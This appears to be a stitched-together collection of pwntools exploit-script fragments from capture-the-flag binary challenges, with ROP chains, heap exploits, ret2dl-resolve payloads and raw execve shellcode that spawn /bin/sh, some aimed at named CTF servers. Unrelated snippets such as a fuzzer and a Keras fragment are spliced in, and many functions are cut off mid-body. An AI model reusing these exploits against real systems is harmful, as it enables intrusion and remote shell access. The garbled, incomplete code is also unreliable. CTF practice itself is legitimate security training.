def start_debugger(self):
print "\n[*] iteration: %d" %self.iteration
#퍼징 대상 어플리케이션 로드 및 seed 값 전달
pwn.process([self.exe,self.seed]).wait()
#os.system(self.exe+" "+self.seed)
#core파일이 생기면 count 횟수에 맞춰 이름을 변경하고 crashes 디렉터리로 옮김
if os.path.isfile("core"):
print "\n[**] sementation fault is detected"
if os.path.isdir("crashes") is not True:
os.system("mkdir crashes")
else:
pass
core="core"+str(self.count)
os.system("mv core "+core)
os.system("mv "+core+" crashes")
self.count+=1
def exploit(*, remote=True, host="127.0.0.1", port=4242):
print("Please: socat TCP-LISTEN:8080 openssl-connect:SERVER_HERE:4242,cert=client.pem,cafile=server.crt,verify=0")
# socat -d TCP-LISTEN:1234,reuseaddr,fork openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0
if remote:
p = pwn.remote(host, port)
else:
p = pwn.process("./heapme", env={"LD_PRELOAD":"/root/veille/challenge/ctf/FIC_Hexpresso_2019_quals/pwn/secret_ressources/libc-2.23.so"})
# p.interactive()
# 0xf1147 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
one_gadget_rce = 0xf1147
print("[+] Fill memory")
for i in range(70, 80):
create_disk(p, i, 32)
print("B")
write_disk(p, i, b"A" * 32)
create_disk(p, 42, 16)
print("[+] Fill freelist")
for i in range(70, 80):
delete_disk(p, i)
print("#" * 100)
for i in range(80, 100):
create_disk(p, i, 16)
print("Leak " + "#" * 100)
print("=> 3 leak buffer of [5]")
_, heap_leak = read_disk(p, 73)
one_gadget_ptr_offset = heap_leak + 0x700
print("Leak main_arena ".ljust(100, "#"))
create_disk(p, 50, 0x400)
create_disk(p, 51, 16)
delete_disk(p, 50)
create_disk(p, 50, 16)
_, main_arena = read_disk(p, 50)
print(f"main_arena = {main_arena:x}")
libc_base = main_arena - 0x3c4b98
print(f"libc_base = {libc_base:x}")
one_gadget_rce += libc_base
print(f"one_gadget_rce = {one_gadget_rce:x}")
print("Upload one_gadget_rce ".ljust(100, "#"))
create_disk(p, 50, 100)
write_disk(p, 50, pwn.p64(one_gadget_rce)[:6])
read_disk(p, 50)
print("Overwrite ".ljust(100, "#"))
print("=> 12 => overwrite [4] Disk")
write_disk(p, 82, pwn.p64(one_gadget_ptr_offset))
p.sendline("1")
p.sendline("74")
p.interactive()
from pwn import remote, process
io = process('./pwn07')
payload = b'AAAAAAAA\xa4\x00\x00\x00\x85\x00\x00\x00'
io.recv()
io.send(payload)
io.interactive()
cmds = [
# "heap-analysis-helper",
# "format-string-helper",
# gdb_load_symbols_cmd(dbg_file, libc, r.libs()[libc.path]),
# "bp * $_base() + 0x1337",
]
gdb.attach(r,
'\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds))
return
def exploit(r):
# r.sendlineafter(b"> ", b"HelloPwn" )
r.interactive()
return 0
if __name__ == "__main__":
if len(sys.argv) >= 2:
LOCAL = False
context.log_level = "info"
r = remote(sys.argv[1], int(sys.argv[2]))
else:
r = process([
elf.path,
]) #, env={"LD_PRELOAD": libc.path})
attach(r)
# or
#r = gdb.debug([elf.path, ], gdbscript='')
exit(exploit(r))
import pwn
host = "127.0.0.1"
port = 1337
remote = False
binary_path = './vuln'
libc_path = './libc.so.6'
ld_path = "./ld-2.27.so"
binary = pwn.ELF(binary_path)
libc = pwn.ELF(libc_path)
rop_binary = pwn.ROP(binary)
if remote:
r = pwn.remote(host, port)
else:
# r = pwn.process(binary_path)
r = pwn.process([ld_path, binary_path], env={"LD_PRELOAD": libc_path})
r.interactive()
r.close()
from pwn import p32
from pwn import u32
from pwn import process
from pwn import gdb
from pwn import context
ret2win_offset = 0x1f7
fhf_plt = 0x80485f0
context.terminal = ['xterm', '-e', 'sh', '-c']
p = process("./pivot32")
p.recvline()
p.recvline()
p.recvline()
p.recvline()
MA = p.recvline()[-11:].strip("\n") # Get address of fake stack write
print("[+] Mapped segment writing to: {}".format(MA))
# Fake Stack Written to Mapped Section
buf = p32(fhf_plt)
buf += p32(0x080488c0) # 0x080488c0: pop eax; ret;
buf += p32(0x804a024) # fhf_got
buf += p32(0x80488c4) # 0x080488c4: mov eax, dword ptr [eax]; ret;
buf += p32(0x08048571) # 0x08048571: pop ebx; ret;
buf += p32(ret2win_offset) # 0x1f7
buf += p32(0x80488c7) # 0x080488c7: add eax, ebx; ret;
buf += p32(0x080486a3) # 0x080486a3: call eax;
buf += p32(0xdeadbeef) # Show end of fake stack
def __init__(self, remote, binary=None, libc=None, host=None, port=None, *a, **kw):
if not remote: # Local binary
self.tube = pwn.process(binary, *a, **kw) if libc is None else \
pwn.process(binary, env={'LD_PRELOAD': libc}, *a, **kw)
else: # Remote challenge
self.tube = pwn.remote(host, port)
def _init(self):
self._process = process([environ["SHELL"], "-i", "-c", self._procname + " -q"])
self._process.recvrepeat(0.3)
self.send("set confirm off")
self._loadfile()
c = ''
c += pwn.pack(buf2_address) # rbp = buf2_address
c += pwn.pack(0x00000000004006b3) # pop rdi
c += pwn.pack(buf2_address + 32) # */bin/sh
c += pwn.pack(system_address)
c += '/bin/sh\x00'
return c
if __name__ == '__main__':
if pwnlib.args.args['REMOTE']:
p = pwn.connect('csie.ctf.tw', 10132)
else:
p = pwn.process('./migr4ti0n-5b1ebb81d74911197f610391688c934210d79274')
libc = pwn.ELF('./libc.so.6-14c22be9aa11316f89909e4237314e009da38883')
payload1 = 'a' * 48 + ropchain_1()
pwn.gdb.attach(p, gdbscript='b *0x40064a') # + str(hex(buf1_address)))
p.send(payload1)
p.sendline(ropchain_2())
print p.recvline() # try your best
puts_got = p.recvline()
puts_got = pwn.u64(puts_got[:-1].ljust(8, '\x00'))
print hex(puts_got)
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
####################
#### CONNECTION ####
####################
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False
LOCAL_BIN = "./vuln"
REMOTE_BIN = "~/vuln" #For ssh
LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary
ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10', 1339) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary
ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0',
'bandit.labs.overthewire.org',
password='******',
port=2220)
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
elf = ELF(LOCAL_BIN) # Extract data from binary
#!/usr/bine/env python
import pwn
import r2pipe
import json
bin = './crackme0x00'
r = r2pipe.open(bin)
t = pwn.process(bin)
token = r.cmdj('izj')[2]['string'].decode('base64')
print '[+] Using {} as the password'.format(token)
t.readline()
t.sendline(token)
print t.readline()
import pwn
BINARY = "{{ binary }}"
REMOTE = ("{{ remote_host }}", {{ remote_port }})
if pwn.args['REMOTE']:
p = pwn.remote(REMOTE[0], REMOTE[1])
elf = pwn.ELF(BINARY)
{% if libc is not none %}libc = pwn.ELF("{{ libc['REMOTE'] }}"){% endif %}
else:
p = pwn.process(BINARY)
elf = p.elf
{% if libc is not none %}libc = pwn.ELF("{{ libc['LOCAL'] }}"){% endif %}
def ropchain(chain, save=None):
def flatten(arr):
s = []
for e in arr:
if isinstance(e, list):
s += flatten(e)
else:
if isinstance(e, int):
e = pwn.p32(e)
s.append(e)
return s
rop = b''.join(flatten(chain))
if save is not None:
with open(save, 'wb') as w:
w.write(rop + b'\n')
#!/usr/bin/env python2
import pwn
remote = True
flag = ""
last_char = ""
index = 0
while last_char != '}':
if remote:
r = pwn.remote("babytrace.quals2019.oooverflow.io", 5000)
else:
r = pwn.process("pitas.py")
# Header
r.recvuntil("# Are you ready for the PITA?\n\n")
# Binary select
r.recvuntil("Choice: ")
r.sendline("2")
# start trace
r.recvuntil("Choice: ")
r.sendline("1")
# add input constraint
r.recvuntil("Choice: ")
r.sendline("3")
# r.sendline("input")
from roputils import *
from pwn import process
binary = 'xdctf-pwn200'
r = process(binary)
rop = ROP(binary)
offset = 112
bss_base = rop.section('.bss')
buf = rop.fill(offset)
buf += rop.call('read', 0, bss_base, 100)
# after using read to construct our symtab in .bss + 20, we use dl_resolve to call it
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
r.send(buf)
# over here we just fill in .bss with the data we need
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(bss_base + 20, 'system')
r.send(buf)
r.interactive()
from roputils import *
from pwn import process
from pwn import gdb
from pwn import context
r = process('./main')
context.log_level = 'debug'
r.recv()
rop = ROP('./main')
offset = 112
bss_base = rop.section('.bss')
buf = rop.fill(offset)
buf += rop.call('read', 0, bss_base, 100)
# used to call dl_Resolve()
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
r.send(buf)
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
# used to make faking data, such relocation, Symbol, Str
buf += rop.dl_resolve_data(bss_base + 20, 'system')
buf += rop.fill(100, buf)
r.send(buf)
r.interactive()
import os
os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')
import pwn
from struct import pack
remote_binary = "./vuln"
pr = pwn.process(remote_binary)
def segfault():
"""
find offset with pwn.cyclic
"""
ofs = pwn.cyclic_find(pwn.p32(0x61616168))
payload = b"A" * ofs + create_ropgadget()
pr.sendlineafter("Can you ROP your way out of this one?\n", payload)
pr.interactive()
def create_rop():
binary = pwn.ELF.from_assembly(
"pop eax;pop ebx;pop ecx"
)
rop = pwn.ROP(binary)#remote_binary)
return rop.chain()
def create_ropgadget():
# execve generated by ROPgadget
# ROPgadget --binary ./vuln --ropchain --badbytes 0a
# Padding goes here
p = ''
gc();
d = new Date(oo);
str.concat(ooo);
''' % payload.__repr__()[1:-1]
r.send(oneline(js_payload) + '\n')
remote_addr = None
binary_filename = './build/debug/js'
if remote_addr:
r = pwn.remote(*remote_addr)
else:
r = pwn.process(binary_filename, aslr=0)
pwn.context.terminal = ['tmux', 'splitw', '-h']
# find useful offsets in binary
binary = pwn.ELF(binary_filename)
sentinel_offset = binary.symbols['sentinel']
realloc_got_offset = binary.got['realloc']
# find useful offsets in libc
libc = pwn.ELF('/lib/x86_64-linux-gnu/libc.so.6')
realloc_offset = libc.symbols['realloc']
system_offset = libc.symbols['system']
gets_offset = libc.symbols['gets']
from pwnlib import shellcraft
from pwnlib.args import args
from pwn import connect, process, p64, asm
shellcode = shellcraft.amd64.linux.sh()
shellcode = asm(shellcode, arch='amd64', os='linux')
print len(shellcode)
payload = 'x' * 248 + p64(0x601080)
if args['REMOTE']:
p = connect('csie.ctf.tw', 10126)
else:
p = process('./ret2sc-a6a74cce51b034b6570e5416a38973c195d1b414')
p.sendline(shellcode)
p.sendline(payload)
p.interactive()
from roputils import *
import pwn
# pwn.context(log_level="debug")
fpath = "./pwn1"
offset = 504
rop = ROP(fpath)
# print rop.fpath
# p = Proc(rop.fpath)
p = pwn.process(rop.fpath)
# p = pwn.remote("127.0.0.1",12346)
pwn.gdb.attach(p,"b*0x804859c\nc")
# addr_bss = rop.section('.bss')
addr_bss = 0x0804A080
# buf = rop.retfill(offset)
# buf = rop.dl_resolve_call(addr_bss+0x110, addr_bss)#
# buf += p32(addr_bss+len(buf)+0x10+0x4)
# buf += 'a'*0x10
# buf += rop.string('/bin/sh')
# buf += (0x110-len(buf))*'a'
# buf += rop.dl_resolve_data(addr_bss+0x110, 'system')
# buf += (0x1f4-len(buf))*'a'
buf = p32(0x0804A080+4)+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
buf += (0x1f4-len(buf))*'a'
p.send(buf)
import pwn
import struct
import time
import subprocess
import re
LOCAL = False
if LOCAL:
sh = pwn.process('hive')
else:
sh = pwn.remote('104.196.102.240', 5000)
def get_timestamp_hash (timestamp) :
proc = subprocess.Popen('./hive_patched', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
stdout, stderr = proc.communicate(struct.pack('<L', timestamp))
return stdout[-33:]
def login(sh):
initial = sh.recv(1024)
timestr = re.findall('time is: (.*?),', initial)[0]
print '[+] timestr', timestr
timehash = get_timestamp_hash(int(timestr))
print '[+] timehash', timehash
sh.sendline('username')
sh.sendline('5up3rm@n')
sh.sendline(timehash)
def build_rop():
pack = struct.pack
optimizer=keras.optimizers.Adam(lr=1e-2),
metrics=['accuracy'])
model.fit(X, Y, epochs=300)
y_pred = model.predict(X)
print(y_pred, Y)
response = ''.join([chr(int(256 * a)) for a in y_pred.ravel()])
print('Response is ... ', response)
print("IT'S MORE EASY THAN TATH!")
print(
"Just put to 0 everythng, invert ouput function and assign only bias term."
)
bias = [np.log(i / (1 - i)) for i in y]
#bias = [-0.41197978912935806, -0.31508104663989539, -0.49419322371684876, -0.39570893316279959]
print(bias)
conn = process('Challenge/Pilgrim/NNawkward_pilgrim')
conn.sendline('1')
conn.sendline('3')
conn.sendline()
for _ in range(16):
conn.sendline('0')
conn.sendline('4')
conn.sendline()
for i in range(4):
conn.sendline('0')
for i in range(4):
conn.sendline('%.14f' % bias[i])
conn.sendline('2')
conn.interactive()
#!/usr/bin/env python
import pwn
libc = pwn.ELF('libc.so')
elf_Demo = pwn.ELF('Demo')
attack = pwn.process('./Demo')
# attack = remote('127.0.0.1', 23333)
plt_write = elf_Demo.symbols['write']
print '###### plt_write = ' + hex(plt_write)
got_write = elf_Demo.got['write']
print '###### got_write = ' + hex(got_write)
overflow_addr = 0x08048471
print '###### overflow_addr = ' + hex(overflow_addr)
payload = 140 * 'a'
payload += pwn.p32(plt_write)
payload += pwn.p32(overflow_addr)
payload += pwn.p32(1)
payload += pwn.p32(got_write)
payload += pwn.p32(4)
print "[1] Sending payload"
attack.send(payload)
print "[2] Receiving addr_write"
addr_write = pwn.u32(attack.recv(4))
print 'addr_write = ' + hex(addr_write)
#!/usr/bin/python
import pwn
payload = b"A" * 40 + pwn.pack(0x0804851b, 32) + b"\n"
payload2 = b"AAAAAAAAAAAAAAAAAAA\n"
p = pwn.process("./kanagawa")
#p = pwn.remote("challs.dvc.tf", 4444)
p.send(payload)
print(p.recv())
p.send(payload2)
print(p.recv())
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if pwn.args.GDB:
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return pwn.process([exe.path] + argv, *a, **kw)
def startIt():
global p
global fmtStr
p = process(os.path.join(SCRIPTDIR,fName),buffer_fill_size=0xffff)
p.recvuntil("Input: ")
fmtStr = FormatString(exec_fmt,elf=elf)
def __init__(self, pdir):
print colored('>> Happy pwning !', 'cyan')
self.conn = pwn.process(pdir)
from pwn import process
from tempfile import NamedTemporaryFile
with NamedTemporaryFile() as f:
f.write("Hello.")
p = process(["/usr/bin/sudobcvi", f.name])
p.sendline("r")
print p.recv(1024)
print("New email:")
hexdump(email)
print()
if len(sys.argv) > 1:
# Only do the IO stuff if we run with args (doesn't matter what).
# This is so we can test the functions above without intializing pwntools
# every time.
if sys.argv[1] == 'r':
# Run on remote
p = pwn.remote('chal.2020.sunshinectf.org', port=10001)
else:
# Debug local process
p = pwn.process('./runpeg -p peg_rev_checker.so LicenseChecker.peg -d',
shell=True)
p.recvuntil('EAR debugger')
p.sendline('')
p.recvuntil('(dbg) ')
p.sendline('b 0x01E8')
p.sendline('c')
p.recvuntil('Email: ')
p.send(email)
p.recvuntil('License key: ')
license = b''.join(license)
p.send(license)
import pwn
import re
import os
elf = pwn.ELF('./be-quick-or-be-dead-2')
fib_number = 4368447739709774716003881551397205159088952756411141941533814668901464054869881997817744932743716769887780898920209866426445447485522551760777962122217963045451173078851717190916177144613851841799958503738854017612313939353
# modifying alarm function to do nothing using 'ret'
elf.asm(elf.symbols['alarm'], 'ret')
# modifying 'calculate_key function to return the number after changing it into 32-bits, Hopper can be used to find the function name and fib_number
elf.asm(elf.symbols['calculate_key'],
'mov eax,%s\nret\n' % (hex(fib_number & 0xFFFFFFFF)))
# saving to new binary
elf.save('./new')
os.system('chmod +x ./new')
p = pwn.process('./new')
prompt = p.recvall()
flag = re.findall('\n(.*)', prompt)[5]
print flag
import pwn
# Setup enviroment
process = pwn.process("./split")
pwn.context(os="linux", arch="amd64")
elf = pwn.ELF("split")
rop = pwn.ROP(elf)
rop.system(next(elf.search("cat flag")))
print str(rop.dump())
process.readline()
process.readline()
process.readline()
payload = "A" * 40 + rop.chain()
print payload
process.sendline(payload)
process.readline()
print process.readline()[2:]
process.shutdown()
"""
# NOTES:
# It's not pretty, but it worked.
# Comments + slight modifications added post-solve.
# export PROG='/bin/ls' before running to mimic server environment.
if not ONLINE:
LIBC_PATH = "/lib/i386-linux-gnu/libc.so.6"
if GDB_BEGIN:
log("Starting with GDB BEGIN")
c = pwn.gdb.debug(BINARY_PATH, GDB_SCRIPT)
else:
log("Starting \"{}\"".format(BINARY_PATH))
c = pwn.process(BINARY_PATH)
if GDB_DEBUG:
log("Attaching GDB")
pwn.gdb.attach(c, GDB_SCRIPT)
else:
LIBC_PATH = "./libc-2.27.so"
c = pwn.connect(HOST, PORT)
LIBC = pwn.ELF(LIBC_PATH)
# Really gross way of parsing out the leaked data...
def grossLeak(leak, payload):
try:
# Get what we're interested in.
leak = "'$'".join(
import pwn
#p = pwn.remote("chall.pwnable.tw", 10000)
p = pwn.process("./start")
output = p.recv(20)
# 20 bytes | return address | esp | ->saved esp points here<-
payloud = "a" * 20 + pwn.p32(0x8048087)
p.send(payloud)
output = p.recv(20)
esp = pwn.u32(output[:4])
pwn.log.info("output: " + repr(output))
pwn.log.info("leaked esp: {}".format(hex(esp)))
#shellcode = open("hello.bin", 'rb').read()
shellcode = open("nasm.bin", 'rb').read()
#shellcode = "1\xc0\xb0\x0b1\xc91\xbd2Rhn/shh//bi"
# second time through:
# 20 bytes | return address | esp v points at byte 4 of 20
# xxxxxxxx xxxxxxxxxxxxxx | 20 more bytes... : | eip | shellcode
# our second payload is written starting where esp used to be stored,
# which is at esp-4
ecx = esp - 4
payload = "a" * 20 + pwn.p32(ecx + 24) + shellcode
assert len(payload) < 0x3c
p.send(payload)
#print(p.read(4))
#!/usr/bin/env python3
import pwn
rem = pwn.process('./unlink')
stack_addr = int(rem.recvline().split()[5], 0)
heap_addr = int(rem.recvline().split()[5], 0)
ret_addr = stack_addr + 0x28
jmp_addr = heap_addr + 0x20
shell_func = 0x080484eb
pwn.context.arch = 'i386'
shellcode = pwn.asm('''
jmp safe
nop
nop
nop
nop
safe:
push 0x080484eb
ret
''')
payload = b'A' * 16 + pwn.p32(heap_addr) + pwn.p32(stack_addr) + shellcode
pwn.pause()
rem.sendline(payload)
rem.interactive()
#!/usr/bin/env python
import pwn
import re
p = pwn.process(['./jmper'])
pwn.context.terminal = ['tmux', 'splitw', '-h', '-p', '75']
stdouttosys = -0x17bba0
def add_student(n=1):
for i in range(n):
p.recvuntil(":)")
p.sendline("1")
return
def name_student(ID, name, sen=0):
p.recvuntil(":)")
p.sendline("2")
p.recvuntil("ID:")
p.sendline(str(ID))
p.recvuntil("name:")
if sen == 0:
p.sendline(name)
else:
p.send(name)
return
def write_memo(ID, memo, sen=0):
def runchain(exe, ch):
proc = pwn.process(exe)
proc.sendline(ch)
return proc.recvall()
#!/usr/bin/env python3
import pwn
if pwn.args['LOCAL']:
io = pwn.process(['./alive_note'])
else:
io = pwn.remote('chall.pwnable.tw', 10300)
elf = pwn.ELF('./alive_note')
#shellcode = pwn.asm('''
#xor al, 0x32
#xor al, 0x33
#xor al, 0x34
#xor al, 0x35
#''')
shellcode0 = 'PYjAXEqH'
shellcode1 = '4AHEEEqH'
def add_note(index, data, pad=False):
io.recvuntil('Your choice :')
io.sendline(str(1))
io.recvuntil('Index :')
io.sendline(str(index))
io.recvuntil('Name :')
io.sendline(data)
if not pad:
for i in range(3):
add_note(9, 'A' * 8, True)
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054370) # xor eax, eax ; ret
#p += pack('<I', 0x080a18cd) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08065952) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806e971) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806e94a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054370) # xor eax, eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x080493f1) # int 0x80
r = process('./pratice4')
r.recvuntil('name ?')
r.sendline(p)
r.interactive()
import re
import pwn
CANARY = 0x8049D68
USE_GDB = False
if USE_GDB:
p = pwn.process(['gdb', './www'])
_ = p.recvuntil('gdb-peda$ ')
p.sendline('b strcmp')
_ = p.recvuntil('gdb-peda$ ')
p.sendline('r')
# Adjust amount of recvlines if necessary.
print p.recvline()
print p.recvline()
print p.recvline()
print p.recvline()
else:
p = pwn.process('./www')
_ = p.recvline()
buffer_line = p.recvline().rstrip('\n')
m = re.match(r"buffers at 0x([a-f0-9]+) and 0x([a-f0-9]+)", buffer_line)
b1_address = int(m.group(1), 16)
b2_address = int(m.group(2), 16)
pwn.log.info("Buffers at {:08x} and {:08x}".format(b1_address, b2_address))
